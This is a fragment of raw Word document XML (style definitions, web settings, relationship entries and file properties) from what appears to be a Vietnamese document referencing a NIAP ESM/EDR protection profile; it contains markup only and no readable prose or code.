    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Than1">
    <w:name w:val="Than1"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:color w:val="00000A"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FrameContents">
    <w:name w:val="Frame Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="160" w:line="252" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="font495"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Thannghieng">
    <w:name w:val="Thannghieng"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:i/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-V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AHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Heading"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Index"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8336"/>
      </w:tabs>
      <w:ind w:left="1132"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderLeft">
    <w:name w:val="Header Left"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4734"/>
        <w:tab w:val="right" w:pos="9468"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Courier New" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="SimSun" w:hAnsi="Arial"/>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1D1417"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1320"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1540"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1760"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="style2">
    <w:name w:val="style 2"/>
    <w:basedOn w:val="Heading4"/>
    <w:link w:val="style2Char"/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style2Char">
    <w:name w:val="style 2 Char"/>
    <w:link w:val="style2"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="SimSun" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Phlcbng">
    <w:name w:val="Phụ lục bảng"/>
    <w:basedOn w:val="HTMLPreformatted"/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="212121"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Phlchnh">
    <w:name w:val="Phụ lục hình"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="001D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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Malgun Gothic" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bodytext0">
    <w:name w:val="Body text_"/>
    <w:link w:val="BodyText4"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bodytext115pt">
    <w:name w:val="Body text + 11.5 pt"/>
    <w:aliases w:val="Bold,Body text + 9.5 pt"/>
    <w:rsid w:val="001D1417"/>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BodyText1">
    <w:name w:val="Body Text1"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyText4">
    <w:name w:val="Body Text4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Bodytext0"/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="420" w:line="395" w:lineRule="exact"/>
      <w:ind w:hanging="3020"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodytextSmallCaps">
    <w:name w:val="Body text + Small Caps"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps/>
      <w:strike w:val="0"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TD6">
    <w:name w:val="TD6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TD6Char"/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="vi-VN" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TD6Char">
    <w:name w:val="TD6 Char"/>
    <w:link w:val="TD6"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DT1">
    <w:name w:val="DT1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DT1Char"/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:ind w:left="142"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DT1Char">
    <w:name w:val="DT1 Char"/>
    <w:link w:val="DT1"/>
    <w:rsid w:val="001D1417"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="pt-PT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="notranslate">
    <w:name w:val="notranslate"/>
    <w:rsid w:val="006F029D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Hinhve">
    <w:name w:val="Hinh ve"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HinhveChar"/>
    <w:qFormat/>
    <w:rsid w:val="00851C6A"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="22"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HinhveChar">
    <w:name w:val="Hinh ve Char"/>
    <w:link w:val="Hinhve"/>
    <w:rsid w:val="00851C6A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nomal2">
    <w:name w:val="Nomal2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Nomal2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00FD4D13"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nomal2Char">
    <w:name w:val="Nomal2 Char"/>
    <w:link w:val="Nomal2"/>
    <w:rsid w:val="00FD4D13"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>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884112">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="471366200">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1383364430">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1647734873">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21339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yperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://254EE0606F2C05722FBE653EE250D260BFD39CCD/file%3A%2F%2F%2FC%3A%5Chome%5Crunner%5Cwork%5Cesm-edr%5Cesm-edr%5Ccommoncriteria.github.io%5Cpp%5Cesm-edr%5Cesm-edr.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId55"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yperlink" Target="http://254EE0606F2C05722FBE653EE250D260BFD39CCD/file%3A%2F%2F%2FC%3A%5Chome%5Crunner%5Cwork%5Cesm-edr%5Cesm-edr%5Ccommoncriteria.github.io%5Cpp%5Cesm-edr%5Cesm-edr.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId58"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image" Target="media/image1.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm"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254EE0606F2C05722FBE653EE250D260BFD39CCD/file%3A%2F%2F%2FC%3A%5Chome%5Crunner%5Cwork%5Cesm-edr%5Cesm-edr%5Ccommoncriteria.github.io%5Cpp%5Cesm-edr%5Cesm-edr.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="Externa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yperlink" Target="http://254EE0606F2C05722FBE653EE250D260BFD39CCD/file%3A%2F%2F%2FC%3A%5Chome%5Crunner%5Cwork%5Cesm-edr%5Cesm-edr%5Ccommoncriteria.github.io%5Cpp%5Cesm-edr%5Cesm-edr.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://254EE0606F2C05722FBE653EE250D260BFD39CCD/file%3A%2F%2F%2FC%3A%5Chome%5Crunner%5Cwork%5Cesm-edr%5Cesm-edr%5Ccommoncriteria.github.io%5Cpp%5Cesm-edr%5Cesm-edr.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.htm" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.niap-ccevs.org/MMO/PP/430/esm-edr-release.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4B2DF-FCA3-4667-97FA-F32F19E6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10796</Words>
  <Characters>61538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72190</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="204" baseType="variant">
      <vt:variant>
        <vt:i4>1441847</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>200</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102751</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507383</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>194</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102750</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966134</vt:i4>
      </vt:variant>
      <vt:variant>
